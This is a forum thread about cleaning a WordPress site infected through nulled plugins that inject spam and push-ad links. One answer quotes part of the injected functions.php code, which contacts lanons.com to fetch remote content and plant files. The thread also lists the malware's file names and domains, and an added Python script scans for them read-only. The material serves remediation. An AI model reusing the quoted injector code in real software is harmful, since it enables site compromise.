Malware
Oleg Korolenko, 2017-11-15 16:18:11

How to remove unwanted links from a WordPress site?

Hello, my site (WordPress + WooCommerce) received the following letter from AdWords... All campaigns were suspended... I scanned the site with everything possible, nothing was found. I also searched for these links in the files, there was nothing...

Unwanted links found on your site:
deloton.com/apu.php?zoneid=1459841
go.mobisla.com/notice.php?p=1459844&interactive=1&pushup=1
go.pub2srv.com/apu.php?zoneid=1459841
go.pushnative.com/notice.php?p=1459844&interactive=1&pushup=1


4 answer(s)
Cristalius, 2018-02-08
@legoex

These links appear as a result of installing plugins or themes from third-party resources. Let's say I grabbed mine from www.freenulled.top and, after 3 hours of research and calculations, determined that the class.plugin-modules.php or class.theme-modules.php files are in the plugin folder. Delete them from the hosting immediately (check for these files across the entire site): they contain the initial installation code for the worm, which pulls everything from the site lanons.com or zanons.com, writes entries in functions.php and creates files.
Then go to the template's functions.php, and at the very beginning you will see:
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
if ($ping) {
$content = @file_get_contents(' www.lanons.com/o.php?host= ' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents(' www.lanons.com/admin.txt '));
// echo ABSPATH . 'wp-includes/class.wp.php';
}
and the end.....
//install_code_end ?>
Delete all this code.
Next, go to wp-includes/ and at the very bottom you will see the files:
wp-tmp.php
wp-vcd.php
wp-feed.php
wp-cd.php
Delete them too; they are all connected with the virus, and you will see your final links in them.
Better yet, download the entire site to your computer and, in Notepad++, use the search in files: specify the folder of the downloaded site and enter the domains of your links. It will check all files for entries; delete them.
Then enter lanons.com and delete all the code in the same way.
Also check for wp-tmp entries and the other files that I listed above.
Well, that seems to be everything))
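
The search described in the answer above, as an added example that is not part of the original post: a read-only Python scan of a downloaded copy of the site for the file names, code markers and domains named in this thread. The function name `scan_site`, the `extra_needles` parameter and the list of file suffixes searched are assumptions made for the example.

```python
"""Read-only scan of a downloaded WordPress tree for the thread's indicators."""
import sys
from pathlib import Path

# File names the answer says to look for (installer files, then wp-includes files).
INSTALLER_NAMES = {"class.plugin-modules.php", "class.theme-modules.php"}
WP_INCLUDES_NAMES = {"wp-tmp.php", "wp-vcd.php", "wp-feed.php", "wp-cd.php"}
# Strings to search for inside files: code markers and domains quoted in the thread.
MARKERS = ["//install_code1", "//install_code_end"]
DOMAINS = ["lanons.com", "zanons.com", "deloton.com", "go.mobisla.com",
           "go.pub2srv.com", "go.pushnative.com"]
# Assumption: only these file types are worth a content search.
TEXT_SUFFIXES = {".php", ".js", ".html", ".htm"}


def scan_site(root, extra_needles=()):
    """Return sorted (relative_path, reason) findings; nothing is modified."""
    root = Path(root)
    needles = [n.lower() for n in
               MARKERS + DOMAINS + sorted(WP_INCLUDES_NAMES) + list(extra_needles)]
    findings = set()
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        name = path.name.lower()
        if name in INSTALLER_NAMES:
            findings.add((rel, "installer file name"))
        if name in WP_INCLUDES_NAMES and path.parent.name == "wp-includes":
            findings.add((rel, "listed file name in wp-includes"))
        if path.suffix.lower() not in TEXT_SUFFIXES:
            continue
        # errors="replace" keeps odd encodings from aborting the scan.
        text = path.read_text(encoding="utf-8", errors="replace").lower()
        for needle in needles:
            if needle in text:
                findings.add((rel, f"contains {needle}"))
    return sorted(findings)


if __name__ == "__main__":
    # Usage: python scan_wp.py /path/to/downloaded/site
    for rel, reason in scan_site(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}: {reason}")
```

Hits are leads for manual review rather than proof of infection. Any other link domains reported for your own site can be passed through `extra_needles`.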

Dmitry, 2017-11-15
@Nardil

Maybe there is a virus on the site, one that generates third-party links with a script? Check the site with the Aibolit service, if possible.

solo__dj, 2018-03-24
@solo_dj

Cristalius helped. It remains to work out which plugin brought this infection. By the way, https://aw-snap.info/file-viewer/ is an excellent scanner, without unnecessary rubbish.

Mikhail Yesenin, 2019-01-15
@mirzok

You can scan for virus files and unwanted links using https://metascan.ru. It will also report vulnerabilities for WordPress if you have security holes or outdated plugins with vulnerabilities.
